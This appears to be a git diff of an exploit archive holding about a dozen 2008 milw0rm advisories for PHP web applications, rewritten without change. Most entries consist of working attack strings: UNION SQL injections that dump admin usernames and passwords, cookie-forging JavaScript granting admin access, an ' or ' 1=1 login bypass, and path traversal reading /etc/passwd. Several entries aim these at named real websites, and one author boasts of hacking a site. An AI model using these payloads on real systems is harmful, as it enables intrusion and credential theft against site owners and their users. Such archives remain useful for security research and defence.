+[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
+[~] 
+[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6960.txt b/platforms/php/webapps/6960.txt
index fd22c8956..a6d81b002 100755
--- a/platforms/php/webapps/6960.txt
+++ b/platforms/php/webapps/6960.txt
@@ -1,36 +1,36 @@
-##################################################################
-#
-#   Author: TR-ShaRk
-#
-######################
-#
-#   Web   : StarHack.Us OldKral.Com
-#
-######################
-#
-#   Emai   : Admin@tr-shark.org
-#
-######################
-#
-#   Script price : 19,00€
-#
-#   Here:http://1st-scripts.de/products.php?id=18&associate=
-#
-#
-######################
-#
-#   SQL Injection Vuln. :
-#   products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
-#
-#
-######################
-#
-#   Demo:
-#
-#   http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
-#
-######################
-SEHITLER ÖLMEZ VATAN BÖLÜNMEZ
-Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL
-
-# milw0rm.com [2008-11-02]
+##################################################################
+#
+#   Author: TR-ShaRk
+#
+######################
+#
+#   Web   : StarHack.Us OldKral.Com
+#
+######################
+#
+#   Emai   : Admin@tr-shark.org
+#
+######################
+#
+#   Script price : 19,00€
+#
+#   Here:http://1st-scripts.de/products.php?id=18&associate=
+#
+#
+######################
+#
+#   SQL Injection Vuln. :
+#   products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
+#
+#
+######################
+#
+#   Demo:
+#
+#   http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
+#
+######################
+SEHITLER ÖLMEZ VATAN BÖLÜNMEZ
+Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6962.txt b/platforms/php/webapps/6962.txt
index d89bbf854..4fcf9a6e7 100755
--- a/platforms/php/webapps/6962.txt
+++ b/platforms/php/webapps/6962.txt
@@ -1,45 +1,45 @@
-[~] Powered by BosClassifieds remote sql inj
-[~]
-[~] index.php (catid_id)
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 03.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss yuzden nete ara verebilirim : (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/index.php?cat_id=[SQL]
-
-[SQL]=
-
--9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
-
-example 1: ( you must look title )
-
-http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
-
-( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
-
-example 2: ( you must look title )
-
-http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-03]
+[~] Powered by BosClassifieds remote sql inj
+[~]
+[~] index.php (catid_id)
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 03.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss yuzden nete ara verebilirim : (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/index.php?cat_id=[SQL]
+
+[SQL]=
+
+-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
+
+example 1: ( you must look title )
+
+http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
+
+( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
+
+example 2: ( you must look title )
+
+http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6964.txt b/platforms/php/webapps/6964.txt
index 13c382334..658e9fc1e 100755
--- a/platforms/php/webapps/6964.txt
+++ b/platforms/php/webapps/6964.txt
@@ -1,28 +1,28 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/                                           
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
-# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
-# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
-##########################################################################
-
-Bug In : /admin/Index.php
-   
-   PoC : javascript:document.cookie="username_cookie=admin";
-   
-   [~] Admin panel 
-   http://www.accscripts.com/realestate/demo/admin/index.php
-   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
-   [~] Refresh
-		
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-03]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/                                           
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
+# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
+# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
+##########################################################################
+
+Bug In : /admin/Index.php
+   
+   PoC : javascript:document.cookie="username_cookie=admin";
+   
+   [~] Admin panel 
+   http://www.accscripts.com/realestate/demo/admin/index.php
+   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
+   [~] Refresh
+		
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6965.txt b/platforms/php/webapps/6965.txt
index d59dc2734..d212b5758 100755
--- a/platforms/php/webapps/6965.txt
+++ b/platforms/php/webapps/6965.txt
@@ -1,28 +1,28 @@
-###########################################################################
-______ __ __ ______ __ ______
-/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
-/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
-/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
-/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
-/____/
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
-# [~] Script : http://www.accscripts.com/accstatistics.html
-# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
-##########################################################################
-
-Bug In : /admin/Index.php
-
-PoC : javascript:document.cookie="username_cookie=admin";
-
-[~] Admin panel
-http://www.accstatistics.com/demo/index.php
-[~] Execute JS Code javascript:document.cookie="username_cookie=admin";
-[~] Refresh
-
-
-# Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-03]
+###########################################################################
+______ __ __ ______ __ ______
+/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
+/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
+/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
+/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
+/____/
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
+# [~] Script : http://www.accscripts.com/accstatistics.html
+# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
+##########################################################################
+
+Bug In : /admin/Index.php
+
+PoC : javascript:document.cookie="username_cookie=admin";
+
+[~] Admin panel
+http://www.accstatistics.com/demo/index.php
+[~] Execute JS Code javascript:document.cookie="username_cookie=admin";
+[~] Refresh
+
+
+# Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6966.txt b/platforms/php/webapps/6966.txt
index 1f44c69e5..a84b1aef7 100755
--- a/platforms/php/webapps/6966.txt
+++ b/platforms/php/webapps/6966.txt
@@ -1,28 +1,28 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/                                           
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
-# [~] Script : http://www.accscripts.com/mailinglist/
-# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
-##########################################################################
-
-   
-   PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
-         javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
-   
-   [~] Admin panel 
-   http://www.accscripts.com/mailinglist/demo/index.php
-   [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
-   [~] Refresh
-		
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-03]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/                                           
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
+# [~] Script : http://www.accscripts.com/mailinglist/
+# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
+##########################################################################
+
+   
+   PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
+         javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
+   
+   [~] Admin panel 
+   http://www.accscripts.com/mailinglist/demo/index.php
+   [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
+   [~] Refresh
+		
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6967.txt b/platforms/php/webapps/6967.txt
index ecbf070c1..1d312295c 100755
--- a/platforms/php/webapps/6967.txt
+++ b/platforms/php/webapps/6967.txt
@@ -1,39 +1,39 @@
-[~] MatPo Link Version 1.2 Beta Remote Sql inj.
-[~]
-[~] view.php (id)
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 03.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss yuzden nete ara verebilirim : (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/view.php?id=[SQL]
-
-[SQL]=
-
--999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
-
-example:
-
-http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-03]
+[~] MatPo Link Version 1.2 Beta Remote Sql inj.
+[~]
+[~] view.php (id)
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 03.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss yuzden nete ara verebilirim : (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/view.php?id=[SQL]
+
+[SQL]=
+
+-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
+
+example:
+
+http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6968.txt b/platforms/php/webapps/6968.txt
index 40bd498c8..13132187f 100755
--- a/platforms/php/webapps/6968.txt
+++ b/platforms/php/webapps/6968.txt
@@ -1,19 +1,19 @@
--==========================================-
-Autore: x0r - Road Crew - Evolution Team
-Cms: Acc Autos v4.0
-Bug:  Insecure Cookie Handling
-Site: http://pro7.altervista.org/v2/
--==========================================-
-Exploit:
-
-[+]javascript:document.cookie="username_cookie=admin";
-[+]javascript:document.cookie="right_cookie=1";
-[+]javascript:document.cookie="id_cookie=1";
-
-Live Demo:
-
-http://www.accscripts.com/autos/demo/admin/
-
-Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO.
-
-# milw0rm.com [2008-11-03]
+-==========================================-
+Autore: x0r - Road Crew - Evolution Team
+Cms: Acc Autos v4.0
+Bug:  Insecure Cookie Handling
+Site: http://pro7.altervista.org/v2/
+-==========================================-
+Exploit:
+
+[+]javascript:document.cookie="username_cookie=admin";
+[+]javascript:document.cookie="right_cookie=1";
+[+]javascript:document.cookie="id_cookie=1";
+
+Live Demo:
+
+http://www.accscripts.com/autos/demo/admin/
+
+Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO.
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6969.txt b/platforms/php/webapps/6969.txt
index d741b88e9..90bc36128 100755
--- a/platforms/php/webapps/6969.txt
+++ b/platforms/php/webapps/6969.txt
@@ -1,76 +1,76 @@
-[~] Apoll version Remote Auth Bypass Vulnerability
-[~]
-[~] version: beta 0.7
-[~]
-[~] script dwonload: http://www.miticdjd.com/download/3/
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 03.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss yuzden nete ara verebilirim : (
-[~]
-[~] -----------------------------------------------------------
-
-admin login:
-
-http://localhost/apoll/admin/index.php
-
-
-Exploit:
-
-username: [real_admin_or_user_name] ' or ' 1=1
-
-password: dont write anything
-
-note: generally admin name: admin 
-
-
-example for my localhost:
-
-admin: zorlu
-
-user: salla
-
-
-
-username: zorlu ' or ' 1=1
-
-password: empty
-
-or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
-
-username: salla ' or ' 1=1
-
-password: empty 
-
-
-file: 
-
-apoll/admin/index.php
-
-code:
-
-$user = $_SESSION['user'];
-$pass = $_SESSION['pass'];
-
-$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
-	$num = @mysql_num_rows($mysql);
-
-
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-03]
+[~] Apoll version Remote Auth Bypass Vulnerability
+[~]
+[~] version: beta 0.7
+[~]
+[~] script dwonload: http://www.miticdjd.com/download/3/
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 03.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss yuzden nete ara verebilirim : (
+[~]
+[~] -----------------------------------------------------------
+
+admin login:
+
+http://localhost/apoll/admin/index.php
+
+
+Exploit:
+
+username: [real_admin_or_user_name] ' or ' 1=1
+
+password: dont write anything
+
+note: generally admin name: admin 
+
+
+example for my localhost:
+
+admin: zorlu
+
+user: salla
+
+
+
+username: zorlu ' or ' 1=1
+
+password: empty
+
+or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
+
+username: salla ' or ' 1=1
+
+password: empty 
+
+
+file: 
+
+apoll/admin/index.php
+
+code:
+
+$user = $_SESSION['user'];
+$pass = $_SESSION['pass'];
+
+$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
+	$num = @mysql_num_rows($mysql);
+
+
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6971.txt b/platforms/php/webapps/6971.txt
index 66d3ef27f..87d9ac7b3 100755
--- a/platforms/php/webapps/6971.txt
+++ b/platforms/php/webapps/6971.txt
@@ -1,33 +1,33 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/       EgY Coders Vulnerability Research TM                                    
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : Blind Sql inj / XSS
-# [~] Script :MatPo Link 1.2b
-# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
-##########################################################################
-
-|| Blind Sql Inj ||
- POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
-  Exploit :
-  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
-  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
-  
-  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
-  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
-		
-|| Cross Site Scripting ||
-Poc:
-http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
-Exploit
-http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-03]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/       EgY Coders Vulnerability Research TM                                    
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : Blind Sql inj / XSS
+# [~] Script :MatPo Link 1.2b
+# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
+##########################################################################
+
+|| Blind Sql Inj ||
+ POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
+  Exploit :
+  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
+  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
+  
+  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
+  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
+		
+|| Cross Site Scripting ||
+Poc:
+http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
+Exploit
+http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6972.txt b/platforms/php/webapps/6972.txt
index 31429a318..d6975b549 100755
--- a/platforms/php/webapps/6972.txt
+++ b/platforms/php/webapps/6972.txt
@@ -1,36 +1,36 @@
-# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
-# url: http://sourceforge.net/projects/pppblog/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# In memory of rgod ;)
-
-*Requeriments: register_globals = On
-
-vulnerable code in randompic.php at lines 66-72:
-...
-header("Content-Type: image/gif");
-header("Content-Transfer-Encoding: binary");
-if (is_array($files)){
-    if (is_file($files[$randnum])){
-	readfile("$dir/$files[$randnum]");
-    }
-}
-...
-
-poc[0] = randompic.php?files[0]=[file]
-poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd
-
-linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).
-
-tested on localhost with register_globals = On.
-
-Hack0wn :D
-
-# milw0rm.com [2008-11-03]
+# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
+# url: http://sourceforge.net/projects/pppblog/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# In memory of rgod ;)
+
+*Requeriments: register_globals = On
+
+vulnerable code in randompic.php at lines 66-72:
+...
+header("Content-Type: image/gif");
+header("Content-Transfer-Encoding: binary");
+if (is_array($files)){
+    if (is_file($files[$randnum])){
+	readfile("$dir/$files[$randnum]");
+    }
+}
+...
+
+poc[0] = randompic.php?files[0]=[file]
+poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd
+
+linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).
+
+tested on localhost with register_globals = On.
+
+Hack0wn :D
+
+# milw0rm.com [2008-11-03]
diff --git a/platforms/php/webapps/6973.txt b/platforms/php/webapps/6973.txt
index c70303d72..37a35a467 100755
--- a/platforms/php/webapps/6973.txt
+++ b/platforms/php/webapps/6973.txt
@@ -1,35 +1,35 @@
-[~]-------------------------------------------------------------------------------------------------------------
-[~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability
-[~]
-[~] http://www.tbmnet.de
-[~]  
-[~] 
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Bug founded by d3v1l [Avram Marius]
-[~]
-[~] Date: 3.11.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com http://security-sh3ll.com
-[~]
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] milw0rm staff
-[~]-------------------------------------------------------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
-[~]  
-[~] Ex :-
-
-[~] http://www.valtellinux.it/meeting/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
-[~]----------------------------------------------------------------------------------------------------------------------
-[~] NEED:- magic_quotes=OFF
-[~]
-[~] NEED:- disable_functions=ini_set 
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-04]
+[~]-------------------------------------------------------------------------------------------------------------
+[~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability
+[~]
+[~] http://www.tbmnet.de
+[~]  
+[~] 
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Bug founded by d3v1l [Avram Marius]
+[~]
+[~] Date: 3.11.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com http://security-sh3ll.com
+[~]
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] milw0rm staff
+[~]-------------------------------------------------------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
+[~]  
+[~] Ex :-
+
+[~] http://www.valtellinux.it/meeting/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
+[~]----------------------------------------------------------------------------------------------------------------------
+[~] NEED:- magic_quotes=OFF
+[~]
+[~] NEED:- disable_functions=ini_set 
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6974.txt b/platforms/php/webapps/6974.txt
index ec992bdd6..5ef3c6ce4 100755
--- a/platforms/php/webapps/6974.txt
+++ b/platforms/php/webapps/6974.txt
@@ -1,50 +1,50 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                            			IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	Multi Languages WebShop Online
-[~] Language :         	PHP
-[~] Website[0]:     	http://webbdomain.com/php/webshopir/
-[~] Website[1]:     	http://www.hotscripts.com/Detailed/84437.html
-[~] Type :             	Commercial
-[~] Report-Date :     	04/11/2008
-
-
---[ Founder ]--
-G4N0K 
-
-
---[ Exploit ]--
-SQL => id
-[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
-    http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
-
-XSS => name
-[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
-[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]
-
-
-
---[ L!ve ]--
